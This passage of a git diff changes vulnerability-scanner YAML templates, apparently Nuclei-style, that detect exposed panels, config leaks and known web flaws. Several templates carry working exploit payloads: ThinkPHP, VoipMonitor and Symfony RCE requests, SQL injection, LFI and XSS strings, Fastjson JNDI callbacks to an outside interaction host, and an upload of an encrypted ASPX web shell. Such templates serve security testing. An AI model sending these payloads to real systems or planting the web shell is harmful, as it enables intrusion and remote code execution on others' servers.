(.+)<\/font><\/div>'
+ part: header
diff --git a/poc/other/zuul-panel-11843.yaml b/poc/other/zuul-panel-11843.yaml
index 59636f8546..66226c1746 100644
--- a/poc/other/zuul-panel-11843.yaml
+++ b/poc/other/zuul-panel-11843.yaml
@@ -1,41 +1,27 @@
id: zuul-panel
info:
- name: Zuul Panel - Detect
+ name: Zuul Panel
author: Yuzhe-zhang-0
severity: info
- description: ZUUL panel was detected.
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
- cwe-id: CWE-200
- reference:
- - https://opendev.org/zuul/zuul
- metadata:
- shodan-query: http.favicon.hash:-1127895693
- tags: panel,zuul,cicd,oss
+ reference: https://www.shodan.io/search?query=http.title%3A%22zuul%22+http.favicon.hash%3A-1127895693
+ tags: panel,Zuul,cicd
requests:
- method: GET
+ redirects: true
+ max-redirects: 5
path:
- - '{{BaseURL}}/api/tenants'
- '{{BaseURL}}/api/status'
+ - '{{BaseURL}}/api/tenants'
- host-redirects: true
- max-redirects: 2
- stop-at-first-match: true
- matchers-condition: or
matchers:
- type: word
- part: body
words:
- - '"name":'
- - '"projects":'
- - '"queue":'
- condition: and
+ - 'zuul_version'
- type: word
words:
- - 'zuul_version'
-
-# Enhanced by mp on 2023/01/29
+ - 'name'
+ - 'projects'
+ - 'queue'
diff --git a/poc/php/nuuo-nvrmini2-upgradehandlephp-rce.yaml b/poc/php/nuuo-nvrmini2-upgradehandlephp-rce.yaml
index afbef78823..2db9a198f3 100644
--- a/poc/php/nuuo-nvrmini2-upgradehandlephp-rce.yaml
+++ b/poc/php/nuuo-nvrmini2-upgradehandlephp-rce.yaml
@@ -3,8 +3,8 @@ info:
name: NUUO NVRmini 2 3.0.8 - Remote Code Execution
author: berkdusunur
severity: critical
- tags: rce
- reference: |
+ tags: rce,nuuo
+ reference:
- https://www.exploit-db.com/exploits/45070
- https://github.com/berkdsnr/NUUO-NVRMINI-RCE
- https://packetstormsecurity.com/files/151573/NUUO-NVRmini-upgrade_handle.php-Remote-Command-Execution.html
diff --git a/poc/php/php-fpm-status.yaml b/poc/php/php-fpm-status.yaml
index baedf3cbee..1d1eb52ad1 100644
--- a/poc/php/php-fpm-status.yaml
+++ b/poc/php/php-fpm-status.yaml
@@ -1,13 +1,16 @@
id: php-fpm-status
+
info:
name: PHP-FPM Status
author: geeknik
severity: info
tags: config
+
requests:
- method: GET
path:
- "{{BaseURL}}/status?full"
+
matchers-condition: and
matchers:
- type: word
diff --git a/poc/php/php-proxy-detect-9544.yaml b/poc/php/php-proxy-detect-9544.yaml
index 16d49d2f3b..3978ef9413 100644
--- a/poc/php/php-proxy-detect-9544.yaml
+++ b/poc/php/php-proxy-detect-9544.yaml
@@ -1,26 +1,35 @@
id: php-proxy-detect
+
info:
name: PHP Proxy Detect
author: pikpikcu
severity: info
+ metadata:
+ max-request: 2
tags: tech,php,proxy
-requests:
+
+http:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/proxy"
+
matchers-condition: and
matchers:
- type: word
part: body
words:
- "PHP-Proxy"
+
- type: status
status:
- 200
+
extractors:
- type: regex
part: body
group: 1
regex:
- ''
+
+# digest: 490a0046304402207b3bef18d95acf42b957d883ee45f5b8190c3e65ec36d4396fc711b1475d80d8022047ca111f8d9b193176ee4cdfa87cba20bfc0236f15921cd92606afa3d93191e7:922c64590222798bb761d5b6d8e72950
diff --git a/poc/php/php-timeclock-xss-9553.yaml b/poc/php/php-timeclock-xss-9553.yaml
index 4b06f97417..55686517b4 100644
--- a/poc/php/php-timeclock-xss-9553.yaml
+++ b/poc/php/php-timeclock-xss-9553.yaml
@@ -1,16 +1,18 @@
id: php-timeclock-xss
+
info:
name: PHP Timeclock 1.04 XSS
author: pikpikcu
severity: medium
description: PHP Timeclock version 1.04 (and prior) Cross-Site Scripting vulnerabilities
- reference:
- - https://www.exploit-db.com/exploits/49853
+ reference: https://www.exploit-db.com/exploits/49853
tags: xss,php,timeclock
+
requests:
- method: GET
path:
- "{{BaseURL}}/login.php/'%3E%3Csvg/onload=alert%60{{randstr}}%60%3E"
+
matchers-condition: and
matchers:
- type: status
@@ -22,6 +24,7 @@ requests:
- "PHP Timeclock Admin Login"
part: body
condition: and
+
- type: word
words:
- "text/html"
diff --git a/poc/php/phpinfo-9517.yaml b/poc/php/phpinfo-9517.yaml
index 3ace8f9693..32db6aac90 100644
--- a/poc/php/phpinfo-9517.yaml
+++ b/poc/php/phpinfo-9517.yaml
@@ -1,19 +1,15 @@
id: phpinfo-files
info:
name: phpinfo Disclosure
- author: pdteam,daffainfo,meme-lord,dhiyaneshDK,wabafet
- description: |
- A "PHP Info" page was found. The output of the phpinfo() command can reveal detailed PHP environment information.
- remediation: |
- Remove PHP Info pages from publicly accessible sites, or restrict access to authorized users only.
+ author: bauthard
severity: low
- tags: config,exposure,phpinfo
requests:
- method: GET
path:
- "{{BaseURL}}/php.php"
- "{{BaseURL}}/phpinfo.php"
- "{{BaseURL}}/info.php"
+ - "{{BaseURL}}/_profiler/phpinfo"
- "{{BaseURL}}/infophp.php"
- "{{BaseURL}}/php_info.php"
- "{{BaseURL}}/test.php"
@@ -22,30 +18,9 @@ requests:
- "{{BaseURL}}/pinfo.php"
- "{{BaseURL}}/phpversion.php"
- "{{BaseURL}}/time.php"
- - "{{BaseURL}}/index.php"
- - "{{BaseURL}}/temp.php"
- - "{{BaseURL}}/old_phpinfo.php"
- - "{{BaseURL}}/infos.php"
- - "{{BaseURL}}/linusadmin-phpinfo.php"
- - "{{BaseURL}}/php-info.php"
- - "{{BaseURL}}/dashboard/phpinfo.php"
- - "{{BaseURL}}/_profiler/phpinfo.php"
- - "{{BaseURL}}/_profiler/phpinfo"
- stop-at-first-match: true
- matchers-condition: and
matchers:
- type: word
- part: body
words:
- "PHP Extension"
- "PHP Version"
condition: and
- - type: status
- status:
- - 200
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
- - '>PHP Version <\/td>| ([0-9.]+)'
diff --git a/poc/php/phpmyadmin-setup.yaml b/poc/php/phpmyadmin-setup.yaml
index a501921661..2485003909 100644
--- a/poc/php/phpmyadmin-setup.yaml
+++ b/poc/php/phpmyadmin-setup.yaml
@@ -1,26 +1,17 @@
id: phpmyadmin-setup
+
info:
- name: Publicly Accessible Phpmyadmin Setup
- author: sheikhrishad
+ name: phpMyAdmin setup page
+ author: thevillagehacker
severity: medium
- tags: misc
+ tags: phpmyadmin
+ reference: https://hackerone.com/reports/297339
+
requests:
- method: GET
path:
- - "{{BaseURL}}/phpmyadmin/scripts/setup.php"
- - "{{BaseURL}}/_phpmyadmin/scripts/setup.php"
- - "{{BaseURL}}/forum/phpmyadmin/scripts/setup.php"
- - "{{BaseURL}}/php/phpmyadmin/scripts/setup.php"
- - "{{BaseURL}}/typo3/phpmyadmin/scripts/setup.php"
- - "{{BaseURL}}/web/phpmyadmin/scripts/setup.php"
- - "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php"
- - "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php"
- stop-at-first-match: true
- matchers-condition: and
+ - "{{BaseURL}}/phpmyadmin/setup/index.php"
matchers:
- type: word
words:
- - "You want to configure phpMyAdmin using web interface"
- - type: status
- status:
- - 200
+ - "phpMyAdmin setup"
diff --git a/poc/php/phpunit.yaml b/poc/php/phpunit.yaml
index 5a7c36ba61..0a6b8c40e7 100644
--- a/poc/php/phpunit.yaml
+++ b/poc/php/phpunit.yaml
@@ -1,16 +1,13 @@
id: phpunit
-
info:
name: phpunit.xml file disclosure
author: pikpikcu
severity: info
tags: exposure
-
requests:
- method: GET
path:
- "{{BaseURL}}/phpunit.xml"
-
matchers-condition: and
matchers:
- type: word
@@ -18,7 +15,6 @@ requests:
- ""
condition: and
-
- type: status
status:
- 200
diff --git a/poc/php/phpwiki-lfi-9567.yaml b/poc/php/phpwiki-lfi-9567.yaml
index 8d310252a7..d48b733698 100644
--- a/poc/php/phpwiki-lfi-9567.yaml
+++ b/poc/php/phpwiki-lfi-9567.yaml
@@ -1,23 +1,24 @@
id: phpwiki-lfi
+
info:
- name: phpwiki 1.5.4 - Cross-Site Scripting/Local File Inclusion
+ name: phpwiki 1.5.4 - XSS / Local File Inclusion
author: 0x_Akoko
severity: high
- description: phpwiki 1.5.4 is vulnerable to cross-site scripting and local file inclusion, and allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint.
- reference:
- - https://www.exploit-db.com/exploits/38027
- tags: phpwiki,lfi,xss
+ reference: https://www.exploit-db.com/exploits/38027
+ tags: phpwiki,lfi
+
requests:
- method: GET
path:
- "{{BaseURL}}/phpwiki/index.php/passwd"
+
matchers-condition: and
matchers:
+
- type: regex
regex:
- "root:[x*]:0:0"
+
- type: status
status:
- 200
-
-# Enhanced by mp on 2022/08/04
diff --git a/poc/php/ruijie-phpinfo-9951.yaml b/poc/php/ruijie-phpinfo-9951.yaml
index 43375c6e21..75be404d8b 100644
--- a/poc/php/ruijie-phpinfo-9951.yaml
+++ b/poc/php/ruijie-phpinfo-9951.yaml
@@ -1,14 +1,23 @@
id: ruijie-phpinfo
+
info:
- name: Ruijie Phpinfo
+ name: Ruijie Phpinfo Configuration - Detect
author: pikpikcu
severity: low
- reference: https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20phpinfo.view.php%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
- tags: phpinfo,rujjie,config,exposure
-requests:
+ description: Ruijie phpinfo configuration was detected.
+ classification:
+ cwe-id: CWE-200
+ reference:
+ - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20phpinfo.view.php%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
+ tags: phpinfo,rujjie,config,exposure,ruijie
+ metadata:
+ max-request: 1
+
+http:
- method: GET
path:
- "{{BaseURL}}/tool/view/phpinfo.view.php"
+
matchers-condition: and
matchers:
- type: word
@@ -16,6 +25,9 @@ requests:
- "PHP Version"
- "PHP Extension"
condition: and
+
- type: status
status:
- 200
+
+# Enhanced by cs on 2023/03/02
diff --git a/poc/php/thinkphp-5023-rce-10748.yaml b/poc/php/thinkphp-5023-rce-10748.yaml
index 7f9bd46a05..1cda70e12f 100644
--- a/poc/php/thinkphp-5023-rce-10748.yaml
+++ b/poc/php/thinkphp-5023-rce-10748.yaml
@@ -1,32 +1,32 @@
-id: thinkphp-5023-rce
+id: thinkphp-5023-rce
-info:
- name: ThinkPHP 5.0.23 RCE
- author: dr_set
- severity: critical
- description: Thinkphp5 5.0(<5.0.24) Remote Code Execution.
- reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5.0.23-rce
- tags: thinkphp,rce
+info:
+ name: ThinkPHP 5.0.23 RCE
+ author: dr_set
+ severity: critical
+ description: Thinkphp5 5.0(<5.0.24) Remote Code Execution.
+ reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5.0.23-rce
+ tags: thinkphp,rce
-requests:
- - method: POST
- path:
- - "{{BaseURL}}/index.php?s=captcha"
-
- headers:
- Content-Type: application/x-www-form-urlencoded
-
- body: "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "PHP Extension"
- - "PHP Version"
- - "ThinkPHP"
- condition: and
-
- - type: status
- status:
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/index.php?s=captcha"
+
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+
+ body: "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "PHP Extension"
+ - "PHP Version"
+ - "ThinkPHP"
+ condition: and
+
+ - type: status
+ status:
- 200
\ No newline at end of file
diff --git a/poc/php/twig-php-ssti.yaml b/poc/php/twig-php-ssti.yaml
index f8e8e26d35..d21ecf6b44 100644
--- a/poc/php/twig-php-ssti.yaml
+++ b/poc/php/twig-php-ssti.yaml
@@ -1,9 +1,10 @@
id: twig-php-ssti
+
info:
name: Twig PHP <2.4.4 template engine - SSTI
author: madrobot
severity: high
- tags: php,ssti
+
requests:
- method: GET
path:
diff --git a/poc/php/weiphp-sql-injection.yaml b/poc/php/weiphp-sql-injection.yaml
index 8b0c9a5a1a..2b57dda7f7 100644
--- a/poc/php/weiphp-sql-injection.yaml
+++ b/poc/php/weiphp-sql-injection.yaml
@@ -1,24 +1,28 @@
id: weiphp-sql-injection
+
info:
name: WeiPHP 5.0 SQLI
author: pikpikcu
severity: high
- reference:
- - https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md
- metadata:
- verified: true
- shodan-query: http.html:"WeiPHP5.0"
+ reference: https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md
tags: weiphp,sql
+
requests:
- method: POST
path:
- "{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ "
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+
matchers-condition: and
matchers:
+
- type: word
- part: body
words:
- "52c69e3a57331081823331c4e69d3f2"
+ part: body
+ condition: and
+
- type: status
status:
- 500
diff --git a/poc/php/wp-phpfreechat-xss.yaml b/poc/php/wp-phpfreechat-xss.yaml
index f2e72f6d70..ef3aa1dea3 100644
--- a/poc/php/wp-phpfreechat-xss.yaml
+++ b/poc/php/wp-phpfreechat-xss.yaml
@@ -1,5 +1,4 @@
id: wp-phpfreechat-xss
-
info:
name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS)
author: daffainfo
@@ -7,24 +6,20 @@ info:
reference:
- http://web.archive.org/web/20210120061848/https://www.securityfocus.com/bid/54332/info
tags: wordpress,xss,wp-plugin
-
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
-
matchers-condition: and
matchers:
- type: word
words:
- ""
part: body
-
- type: word
part: header
words:
- text/html
-
- type: status
status:
- 200
diff --git a/poc/python/autobahn-python-detect-593.yaml b/poc/python/autobahn-python-detect-593.yaml
index 5697bfc546..3a6054cc5a 100644
--- a/poc/python/autobahn-python-detect-593.yaml
+++ b/poc/python/autobahn-python-detect-593.yaml
@@ -4,12 +4,10 @@ info:
name: Autobahn-Python Webserver Detect
author: pussycat0x
severity: info
- metadata:
- max-request: 1
- shodan-query: "AutobahnPython"
+ reference: https://www.shodan.io/search?query=%22AutobahnPython%22
tags: tech,webserver
-http:
+requests:
- method: GET
path:
- '{{BaseURL}}'
@@ -29,5 +27,3 @@ http:
part: body
regex:
- 'AutobahnPython([ 0-9.]+)'
-
-# digest: 4a0a004730450220299433f7a72c6c61f07be31feb69fbd48adc66cd0448767c424a96c597a762f7022100cc56d7af729b231f58beaee35f874d397f81497e67985ffb7c2d9c1f74131a56:922c64590222798bb761d5b6d8e72950
diff --git a/poc/python/default-django-page-6841.yaml b/poc/python/default-django-page-6841.yaml
index 450d7e265c..cf3cf5a7f7 100644
--- a/poc/python/default-django-page-6841.yaml
+++ b/poc/python/default-django-page-6841.yaml
@@ -3,8 +3,8 @@ info:
name: Django Default Page
author: dhiyaneshDk
severity: info
- reference:
- - https://www.shodan.io/search?query=http.title%3A%22The+install+worked+successfully%21+Congratulations%21%22
+ metadata:
+ shodan-query: http.title:"The install worked successfully! Congratulations!"
tags: tech,django
requests:
- method: GET
diff --git a/poc/python/django-secret.key.yaml b/poc/python/django-secret.key.yaml
index d682cce94f..8ec28a5f5e 100644
--- a/poc/python/django-secret.key.yaml
+++ b/poc/python/django-secret.key.yaml
@@ -1,62 +1,31 @@
id: django-secret-key
info:
- name: Django Secret Key Exposure
- author: geeknik,DhiyaneshDk
+ name: Django Secret Key
+ author: geeknik
severity: high
- description: |
- The Django settings.py file containing a secret key was discovered. An attacker may use the secret key to bypass many security mechanisms and potentially obtain other sensitive configuration information (such as database password) from the settings file.
- reference: https://docs.gitguardian.com/secrets-detection/detectors/specifics/django_secret_key
- metadata:
- verified: true
- max-request: 7
- shodan-query: html:settings.py
- comments: 'This template downloads the manage.py file to check whether it contains line such as: `os.environ.setdefault("DJANGO_SETTINGS_MODULE", "APP_NAME.settings")` if it does, we extract the APP_NAME to know in what folder to look for the settings.py file.'
- tags: django,exposure,files
+ tags: django
-http:
+requests:
- method: GET
path:
- - "{{BaseURL}}/manage.py"
- "{{BaseURL}}/settings.py"
- "{{BaseURL}}/app/settings.py"
- "{{BaseURL}}/django/settings.py"
- "{{BaseURL}}/settings/settings.py"
- "{{BaseURL}}/web/settings/settings.py"
- - "{{BaseURL}}/{{app_name}}/settings.py"
-
- stop-at-first-match: true
matchers-condition: and
matchers:
+ - type: status
+ status:
+ - 200
- type: word
part: body
words:
- "SECRET_KEY ="
-
- type: word
part: header
words:
- "text/html"
negative: true
-
- - type: status
- status:
- - 200
-
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
- - '"DJANGO_SECRET_KEY", "(.*)"'
-
- - type: regex
- part: body
- internal: true
- name: app_name
- group: 1
- regex:
- - "os.environ.setdefault\\([\"']DJANGO_SETTINGS_MODULE[\"'],\\s[\"']([a-zA-Z-_0-9]*).settings[\"']\\)"
-
-# digest: 4a0a00473045022100b9f99aa21141aff5a2e32d9d17a38a880455bee51e9d5cb86222bbadac6086b402203b18b6d4563233114ccc027031dd1a9e01f8d491147509d60836f496edee6d8b:922c64590222798bb761d5b6d8e72950
diff --git a/poc/python/python-metrics.yaml b/poc/python/python-metrics.yaml
index 6f69f8e072..0236e8b8eb 100644
--- a/poc/python/python-metrics.yaml
+++ b/poc/python/python-metrics.yaml
@@ -4,10 +4,10 @@ info:
author: dhiyaneshDK
severity: low
description: Information Disclosure of Garbage Collection
- tags: exposure,devops,python
reference:
- https://www.shodan.io/search?query=html%3A%22python_gc_objects_collected_total%22
- https://gist.github.com/ruanbekker/e5b1e7895f62b020ff29b5f40767190c
+ tags: exposure,devops,python
requests:
- method: GET
path:
diff --git a/poc/rabbitmq/rabbitmq-dashboard.yaml b/poc/rabbitmq/rabbitmq-dashboard.yaml
index b9add7a446..e881972648 100644
--- a/poc/rabbitmq/rabbitmq-dashboard.yaml
+++ b/poc/rabbitmq/rabbitmq-dashboard.yaml
@@ -1,10 +1,8 @@
id: rabbitmq-dashboard
-
info:
name: RabbitMQ Dashboard
author: fyoorer
severity: info
-
requests:
- method: GET
path:
diff --git a/poc/redis/exposed-redis-7337.yaml b/poc/redis/exposed-redis-7337.yaml
index 166260adf7..825d612ae0 100644
--- a/poc/redis/exposed-redis-7337.yaml
+++ b/poc/redis/exposed-redis-7337.yaml
@@ -4,13 +4,13 @@ info:
author: pdteam
severity: high
reference: https://redis.io/topics/security
- tags: network,redis,unauth
+ tags: network,redis
network:
- inputs:
- data: "info\r\nquit\r\n"
host:
- "{{Hostname}}"
- - "{{Host}}:6379"
+ - "{{Hostname}}:6379"
read-size: 2048
matchers-condition: and
matchers:
diff --git a/poc/remote_code_execution/Digital-Signage-rce.yaml b/poc/remote_code_execution/Digital-Signage-rce.yaml
index c7eea0568a..aa759e322b 100644
--- a/poc/remote_code_execution/Digital-Signage-rce.yaml
+++ b/poc/remote_code_execution/Digital-Signage-rce.yaml
@@ -1,12 +1,10 @@
id: Digital-Signage-rce
-
info:
name: Digital Signage 3.0.9 版本 QH.aspx 文件 远程代码执行漏洞
author: Str1am
severity: critical
reference: https://www.zeroscience.mk/codes/qhsignage_rce.txt
tags: Digital,rce
-
requests:
- raw:
- |
@@ -17,22 +15,21 @@ requests:
------WebKitFormBoundaryhbcZX7o0Hw19h3kr
Content-Disposition: form-data; name="fileToUpload"; filename="cmd.aspx"
Content-Type: application/octet-stream
-
+
<%@ Page Language="C#" %><%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b"); Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>
------WebKitFormBoundaryhbcZX7o0Hw19h3kr
Content-Disposition: form-data; name="action"
-
+
upload
------WebKitFormBoundaryhbcZX7o0Hw19h3kr
Content-Disposition: form-data; name="responderId"
-
+
ResourceNewResponder
------WebKitFormBoundaryhbcZX7o0Hw19h3kr
Content-Disposition: form-data; name="remotePath"
-
+
/opt/resources
------WebKitFormBoundaryhbcZX7o0Hw19h3kr--
-
matchers-condition: and
matchers:
- type: status
@@ -43,4 +40,4 @@ requests:
- "cmd.aspx"
- "true"
part: body
- condition: and
\ No newline at end of file
+ condition: and
diff --git a/poc/remote_code_execution/SymfonyRCE.yaml b/poc/remote_code_execution/SymfonyRCE.yaml
index d0de618202..c78dd48905 100644
--- a/poc/remote_code_execution/SymfonyRCE.yaml
+++ b/poc/remote_code_execution/SymfonyRCE.yaml
@@ -1,5 +1,4 @@
id: rce-symfony
-
info:
name: symfony rce
author: ELSFA7110
@@ -8,19 +7,16 @@ info:
- https://www.acunetix.com/vulnerabilities/web/symfony-rce-via-weak-predictable-app_secret
- https://www.ambionics.io/blog/symfony-secret-fragment
tags: rce
-
requests:
- method: GET
path:
- "{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1"
-
matchers-condition: and
matchers:
- type: word
words:
- "PHP Credits"
part: body
-
- type: status
status:
- 200
diff --git a/poc/remote_code_execution/VOIPrce.yaml b/poc/remote_code_execution/VOIPrce.yaml
index 3e99ae09d3..4f33512058 100644
--- a/poc/remote_code_execution/VOIPrce.yaml
+++ b/poc/remote_code_execution/VOIPrce.yaml
@@ -1,5 +1,4 @@
id: CVE-2021-30461
-
info:
name: VoipMonitor Pre-Auth-RCE
author: nithissh
@@ -7,7 +6,6 @@ info:
description: A malicious actor can trigger Un authenticated Remote Code Execution using CVE-2021-30461.
tags: cve,cve2021,rce,voipmonitor
reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/
-
requests:
- raw:
- |
@@ -21,7 +19,6 @@ requests:
Content-Length: 35
SPOOLDIR=test".system(id)."&recheck=Recheck
-
matchers-condition: and
matchers:
- type: word
@@ -32,7 +29,6 @@ requests:
- "VoIPmonitor installation"
part: body
condition: and
-
- type: status
status:
- 200
diff --git a/poc/remote_code_execution/clockwatch-enterprise-rce-1011.yaml b/poc/remote_code_execution/clockwatch-enterprise-rce-1011.yaml
index f3fd22042e..4a13aa1c66 100644
--- a/poc/remote_code_execution/clockwatch-enterprise-rce-1011.yaml
+++ b/poc/remote_code_execution/clockwatch-enterprise-rce-1011.yaml
@@ -1,19 +1,16 @@
id: clockwatch-enterprise-rce
-
info:
name: ClockWatch Enterprise RCE
author: gy741
severity: critical
tags: clockwatch,rce,network
reference: https://blog.grimm-co.com/2021/07/old-dog-same-tricks.html
-
network:
- inputs:
- data: "C+nslookup {{interactsh-url}}"
-
host:
- "{{Hostname}}"
- - "{{Hostname}}:1001"
+ - "{{Host}}:1001"
matchers-condition: and
matchers:
- type: word
diff --git a/poc/remote_code_execution/code42-log4j-rce.yaml b/poc/remote_code_execution/code42-log4j-rce.yaml
index bbc3bd9189..31d6ae06ba 100644
--- a/poc/remote_code_execution/code42-log4j-rce.yaml
+++ b/poc/remote_code_execution/code42-log4j-rce.yaml
@@ -4,8 +4,7 @@ info:
author: Adam Crosser
severity: critical
description: Remote code execution via log4j vulnerability
- reference:
- - https://support.code42.com/Terms_and_conditions/Code42_customer_support_resources/Code42_response_to_industry_security_incidents
+ reference: https://support.code42.com/Terms_and_conditions/Code42_customer_support_resources/Code42_response_to_industry_security_incidents
classification:
cve-id: CVE-2021-44228
tags: jndi,log4j,rce,cve,cve2021,oast,code42
diff --git a/poc/remote_code_execution/fastjson-1-2-42-rce-7408.yaml b/poc/remote_code_execution/fastjson-1-2-42-rce-7408.yaml
index 6067f012d4..c50092689f 100644
--- a/poc/remote_code_execution/fastjson-1-2-42-rce-7408.yaml
+++ b/poc/remote_code_execution/fastjson-1-2-42-rce-7408.yaml
@@ -1,16 +1,11 @@
id: fastjson-1-2-42-rce
info:
- name: Fastjson 1.2.42 - Remote Code Execution
+ name: Fastjson 1.2.42 Deserialization RCE
author: zh
severity: critical
- description: Fastjson 1.2.42 is susceptible to a deserialization remote code execution vulnerability
reference:
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
- https://github.com/wyzxxz/fastjson_rce_tool
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10.0
- cwe-id: CWE-77
tags: fastjson,rce,deserialization,oast
requests:
- raw:
@@ -34,5 +29,3 @@ requests:
negative: true
status:
- 200
-
-# Enhanced by mp on 2022/05/25
diff --git a/poc/remote_code_execution/fastjson-1-2-47-rce.yaml b/poc/remote_code_execution/fastjson-1-2-47-rce.yaml
index 2971ba72ad..0d9f24a329 100644
--- a/poc/remote_code_execution/fastjson-1-2-47-rce.yaml
+++ b/poc/remote_code_execution/fastjson-1-2-47-rce.yaml
@@ -1,18 +1,13 @@
id: fastjson-1-2-47-rce
info:
- name: Fastjson 1.2.47 - Remote Code Execution
+ name: Fastjson 1.2.47 Deserialization RCE
author: zh
severity: critical
- description: Fastjson 1.2.47 is susceptible to a deserialization remote code execution vulnerability.
reference:
- https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce
- https://www.freebuf.com/vuls/208339.html
- https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955
- https://github.com/wyzxxz/fastjson_rce_tool
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10.0
- cwe-id: CWE-77
tags: fastjson,rce,deserialization,oast
requests:
- raw:
@@ -43,5 +38,3 @@ requests:
words:
- "Bad Request"
- "400"
-
-# Enhanced by mp on 2022/05/25
diff --git a/poc/remote_code_execution/fastjson-1-2-62-rce.yaml b/poc/remote_code_execution/fastjson-1-2-62-rce.yaml
index 0b08215cde..7f16ccb998 100644
--- a/poc/remote_code_execution/fastjson-1-2-62-rce.yaml
+++ b/poc/remote_code_execution/fastjson-1-2-62-rce.yaml
@@ -1,17 +1,14 @@
id: fastjson-1-2-62-rce
+
info:
- name: Fastjson 1.2.62 - Remote Code Execution
+ name: Fastjson 1.2.62 Deserialization RCE
author: zh
severity: critical
- description: Fastjson 1.2.62 is susceptible to a deserialization remote code execution vulnerability.
reference:
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
- https://github.com/wyzxxz/fastjson_rce_tool
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10.0
- cwe-id: CWE-77
tags: fastjson,rce,deserialization,oast
+
requests:
- raw:
- |
@@ -23,15 +20,15 @@ requests:
"@type":"org.apache.xbean.propertyeditor.JndiConverter",
"AsText":"rmi://{{interactsh-url}}/exploit"
}
+
matchers-condition: and
matchers:
- type: word
- part: interactsh_protocol # Confirms DNS Interaction
+ part: interactsh_protocol # Confirms DNS Interaction
words:
- "dns"
+
- type: status
negative: true
status:
- - 200
-
-# Enhanced by mp on 2022/05/25
+ - 200
\ No newline at end of file
diff --git a/poc/remote_code_execution/fastjson-1-2-67-rce-7424.yaml b/poc/remote_code_execution/fastjson-1-2-67-rce-7424.yaml
index 9798de3adc..49fa7d3d12 100644
--- a/poc/remote_code_execution/fastjson-1-2-67-rce-7424.yaml
+++ b/poc/remote_code_execution/fastjson-1-2-67-rce-7424.yaml
@@ -1,22 +1,13 @@
id: fastjson-1-2-67-rce
-
info:
- name: Fastjson 1.2.67 - Remote Code Execution
+ name: Fastjson 1.2.67 Deserialization RCE
author: zh
severity: critical
- description: Fastjson 1.2.67 is susceptible to a remote code execution vulnerability.
reference:
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
- https://github.com/wyzxxz/fastjson_rce_tool
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10.0
- cwe-id: CWE-77
tags: fastjson,rce,deserialization,oast
- metadata:
- max-request: 1
-
-http:
+requests:
- raw:
- |
POST / HTTP/1.1
@@ -30,17 +21,13 @@ http:
"UserTransaction":"rmi://{{interactsh-url}}/Exploit"
}
}
-
matchers-condition: and
matchers:
- type: word
- part: interactsh_protocol # Confirms DNS Interaction
+ part: interactsh_protocol # Confirms DNS Interaction
words:
- "dns"
-
- type: status
negative: true
status:
- 200
-
